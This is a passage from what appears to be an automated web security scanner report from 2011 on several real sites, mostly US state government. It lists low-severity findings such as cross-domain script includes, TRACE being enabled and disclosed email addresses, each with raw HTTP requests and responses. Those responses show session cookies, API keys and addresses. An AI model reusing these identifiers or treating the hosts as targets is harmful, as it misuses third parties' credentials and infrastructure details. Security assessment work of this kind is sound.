User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:03:17 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:09:03 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...

20.182. http://www.tn.gov/revenue/onlinefiling/salesanduse/salestaxefile.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/salesanduse/salestaxefile.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /revenue/onlinefiling/salesanduse/salestaxefile.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:35 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:09:03 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 13795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...

20.183. http://www.ulsystem.net/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ulsystem.net
Path:   /index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.cfm HTTP/1.1
Host: www.ulsystem.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:48:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Language: en-US
Content-Type: text/html; charset=UTF-8


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-trans
...[SNIP]...
ls.jpg','images/imgMapGrambling.jpg','images/imgMapLaTech.jpg','images/imgMapMonroe.jpg','images/imgMapNorthwest.jpg','images/imgMapMcNeese.jpg','images/imgMapUll.jpg','images/imgMapSoutheast.jpg')">
<script type="text/javascript" src="http://louisiana.gov/includes/banner/emergencybanner.js"></script>
...[SNIP]...
</map>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=jtisdell"></script>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.184. http://www.utah.gov/governor/news_media/article.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /governor/news_media/article.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /governor/news_media/article.html HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:50 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 6227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
</div>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

20.185. http://www.utah.gov/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.html HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:15:06 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 64293
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
   
...[SNIP]...
</script>
       <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAc6ECNjVE77-QXWXTlFvveRT6_z3yKnsIwNb2cQzd-HtbMGd75RQzk0eNBVOaXdbl47pIX4-94c91FA&amp;sensor=true" type="text/javascript"></script>
...[SNIP]...

20.186. http://www.utah.gov/pmn/sitemap/notice/67945.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /pmn/sitemap/notice/67945.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pmn/sitemap/notice/67945.html HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.1.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City; zip=84101

Response

HTTP/1.1 200 OK
X-Powered-By: JSP/2.1
Server: Sun Java System Application Server 9.1_01
Set-Cookie: JSESSIONID=62587d63028fa9a37c10611f1005; Path=/pmn
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 30 Apr 2011 11:22:48 GMT
Content-Length: 12502


<!DOCTYPE HTML>
<html>
   <head>
       <title>Public Meeting Notices</title>
           <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
           <script type='text/javascript' src=
...[SNIP]...
<!-- #footer -->
       <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

20.187. http://www.utah.gov/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /services/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services/ HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:52 GMT
Server: Sun Java System Application Server 9.1_02
X-Powered-By: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=66d01a51b6b7b0827a9104dec47e; Path=/utah-gov
Connection: close
Content-Length: 27263


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head
...[SNIP]...
</style>
               <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAOi8V-a8SHv5cCS3z4f_zsxTnG802tlr8OXkJCGUH8uonc-xCpxQVwmcjk736eUtK9V0wZArE2jO8xw&sensor=true"type="text/javascript"></script>
...[SNIP]...

20.188. http://www.utah.gov/services/business.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /services/business.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services/business.html HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:53 GMT
Server: Sun Java System Application Server 9.1_02
X-Powered-By: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=66d06281f671c104df4e14d571af; Path=/utah-gov
Connection: close
Content-Length: 27819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
    <ti
...[SNIP]...
</style>
               <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAOi8V-a8SHv5cCS3z4f_zsxTnG802tlr8OXkJCGUH8uonc-xCpxQVwmcjk736eUtK9V0wZArE2jO8xw&sensor=true"type="text/javascript"></script>
...[SNIP]...

20.189. http://www.utah.gov/services/financial.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /services/financial.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services/financial.html HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:53 GMT
Server: Sun Java System Application Server 9.1_02
X-Powered-By: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=66d0849f7b9c20f1e1a49d53a4f8; Path=/utah-gov
Connection: close
Content-Length: 24360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
    <ti
...[SNIP]...
</style>
               <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAOi8V-a8SHv5cCS3z4f_zsxTnG802tlr8OXkJCGUH8uonc-xCpxQVwmcjk736eUtK9V0wZArE2jO8xw&sensor=true"type="text/javascript"></script>
...[SNIP]...

20.190. http://www.utah.gov/services/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /services/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services/index.html HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:54 GMT
Server: Sun Java System Application Server 9.1_02
X-Powered-By: JSP/2.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=66d0a4f8ee8650fe870693add6be; Path=/utah-gov
Connection: close
Content-Length: 27263


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head
...[SNIP]...
</style>
               <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAOi8V-a8SHv5cCS3z4f_zsxTnG802tlr8OXkJCGUH8uonc-xCpxQVwmcjk736eUtK9V0wZArE2jO8xw&sensor=true"type="text/javascript"></script>
...[SNIP]...

20.191. http://www.utah.gov/whatsnew.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utah.gov
Path:   /whatsnew.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /whatsnew.html HTTP/1.1
Host: www.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: zip=84101; JSESSIONID=6253ef0c9fd08dd164ed9fc46b87; __utmz=147646579.1304162117.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147646579.301159884.1304162117.1304162117.1304162117.1; __utmc=147646579; __utmb=147646579.2.10.1304162117; fontsize=90%25; city=Salt%20Lake%20City;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:56 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 49323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head
...[SNIP]...
<!-- Close Wrapper -->
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.192. http://www.visitflorida.com/facebook_logged_in.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /facebook_logged_in.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /facebook_logged_in.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Content-Length: 1802
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Logged Into Facebook</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</div>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

20.193. http://www.visitflorida.com/florida_vacation_auction/auction_details.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /florida_vacation_auction/auction_details.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /florida_vacation_auction/auction_details.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
<!--Silverpop Web Tracking-->
<script src="http://content.mkt922.com/lp/static/js/iMAWebCookie.js?1d00cff-10c83436509-f528764d624db129b32c21fbca0cb8d6&h=www.pages02.net" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://s.clicktale.net/WRa.js" type="text/javascript"></script>
...[SNIP]...

20.194. http://www.visitflorida.com/floridalive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /floridalive

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /floridalive HTTP/1.1
Host: www.visitflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:02:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=nf9dmcfmtuh81gq8ojaulkllo7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 465042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</span>


<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</ul>
...<script src="http://maps.google.com/maps?file=api&key=ABQIAAAA2frSqavZRhJYxjuN3AmbGxToFm7uFMCuxEeQ8o6zIE2282kSMRTNNRcrJFkh8_4i18guTjXalpJJgw&v=2&sensor=false&channel=visitflorida&client=gme-milesmedia" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/includes/js/colorbox.css" />
<script src="http://platform.twitter.com/anywhere.js?id=qf5cYppNAOJkMRF1suVG9A&v=1" type="text/javascript"></script>
...[SNIP]...
<!--Silverpop Web Tracking-->
<script src="http://content.mkt922.com/lp/static/js/iMAWebCookie.js?1d00cff-10c83436509-f528764d624db129b32c21fbca0cb8d6&h=www.pages02.net" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://s.clicktale.net/WRa.js" type="text/javascript"></script>
...[SNIP]...

20.195. http://www.vtlmi.info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vtlmi.info
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.vtlmi.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 29 Apr 2011 21:06:54 GMT
X-Powered-By: ASP.NET
Connection: close
Content-type: text/html
Page-Completion-Status: Normal

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0043)http://159.105.83.167/Default.aspx?tabid=92 -->
<HTML><HEAD id=Head><TITLE>Economic &amp; Labor Market Infor
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</MAP>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.196. http://www.wor710.com/topic/play_window.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wor710.com
Path:   /topic/play_window.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /topic/play_window.php HTTP/1.1
Host: www.wor710.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:41:44 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Vary: Accept-Encoding,U
X-Powered-By: PHP/4.2.3
Location: http://www.wor710.com/error/warning_error.php?message=An+error+has+occured+on+this+page&path=%2Findex.php&clickMessage=Return+to+Home+Page
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: BIGipServerRadio_Pool=2467317827.20480.0000; path=/
Content-Length: 5996


   <html>
<head>
<title>
- WOR News Talk Radio 710 HD</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   <meta name="keywords" content="wor , joan , hamburg , john , ga
...[SNIP]...
<body onload="javascript:resizeDiv();">
<script type="text/javascript" language="javascript" src="http://ne.edgecastcdn.net/00035F/scripts/minify_20110324.js"></script>
...[SNIP]...
<div id="Box_101952553_Inner_Div" class="Box_101952553_Inner_Div">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21. TRACE method is enabled  previous  next
There are 2 instances of this issue:


21.1. http://services.ito.state.il.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.ito.state.il.us
Path:   /

Request

TRACE / HTTP/1.0
Host: services.ito.state.il.us
Cookie: 4ae53b31fab524c

Response

HTTP/1.1 200 OK
Server:
Date: Sat, 30 Apr 2011 01:32:56 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 77

TRACE / HTTP/1.0
Host: services.ito.state.il.us
Cookie: 4ae53b31fab524c


21.2. http://www.vsea.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.vsea.org
Cookie: b0624302cf8eed13

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:12:52 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vsea.org
Cookie: b0624302cf8eed13


22. Email addresses disclosed  previous  next
There are 263 instances of this issue:


22.1. http://admin.state.nh.us/hr/js/HM_ScriptDOM.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin.state.nh.us
Path:   /hr/js/HM_ScriptDOM.js

Issue detail

The following email address was disclosed in the response:

Request

GET /hr/js/HM_ScriptDOM.js HTTP/1.1
Host: admin.state.nh.us
Proxy-Connection: keep-alive
Referer: http://admin.state.nh.us/hr/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 45735
Content-Type: application/x-javascript
Last-Modified: Mon, 17 Aug 2009 20:05:25 GMT
Accept-Ranges: bytes
ETag: "67f55f761fca1:c5b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:33:45 GMT

/*HM_ScriptDOM.js
* by Peter Belesis. v4.3 020605
* Copyright (c) 2002 Peter Belesis. All Rights Reserved.
* Originally published and documented at http://www.dhtmlab.com/
* Available solely from INT Media Group. Incorporated under exclusive license.
* Contact licensing@internet.com for more information.
*/

HM_IE5M = HM_IE && HM_Mac;
HM_NS6 = (navigator.vendor == ("Netscape6") || navigator.product == ("Gecko"));

if(HM_Konqueror) HM_IE = false;
HM_IE5W = HM_IE && !HM_Mac;
...[SNIP]...

22.2. http://admin.state.nh.us/hr/retirement_benefits.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin.state.nh.us
Path:   /hr/retirement_benefits.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /hr/retirement_benefits.html HTTP/1.1
Host: admin.state.nh.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 01 Apr 2011 14:55:54 GMT
Accept-Ranges: bytes
ETag: "0b943e67cf0cb1:c5b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:33:37 GMT
Content-Length: 13784

<html>
<head>
   <title>Retired Employee Benefits, State of New Hampshire Human Resources</title>
   <meta name=description content="">
   <meta name=keywords content="" >
   <link rel= "stylesheet" type
...[SNIP]...
<a href="mailto:customerservice@caremark.com">customerservice@caremark.com</a>
...[SNIP]...
<a href="mailto:SONH@nhlgc.org">SONH@nhlgc.org</a>
...[SNIP]...

22.3. http://admin.state.nh.us/wellness/scripts/textsizer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin.state.nh.us
Path:   /wellness/scripts/textsizer.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wellness/scripts/textsizer.js HTTP/1.1
Host: admin.state.nh.us
Proxy-Connection: keep-alive
Referer: http://admin.state.nh.us/wellness/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1338
Content-Type: application/x-javascript
Last-Modified: Thu, 29 Oct 2009 12:59:31 GMT
Accept-Ranges: bytes
ETag: "7ac3d6a79758ca1:c5b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:33:43 GMT

/*------------------------------------------------------------
   Document Text Sizer- Copyright 2003 - Taewook Kang. All rights reserved.
   Coded by: Taewook Kang (txkang.REMOVETHIS@hotmail.com)
   Web Site: http://txkang.com
   Script featured on Dynamic Drive (http://www.dynamicdrive.com)
   
   Please retain this copyright notice in the script.
   License is granted to user to reuse this code
...[SNIP]...

22.4. http://ads.adbrite.com/adserver/vdi/711384  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The following email address was disclosed in the response:

Request

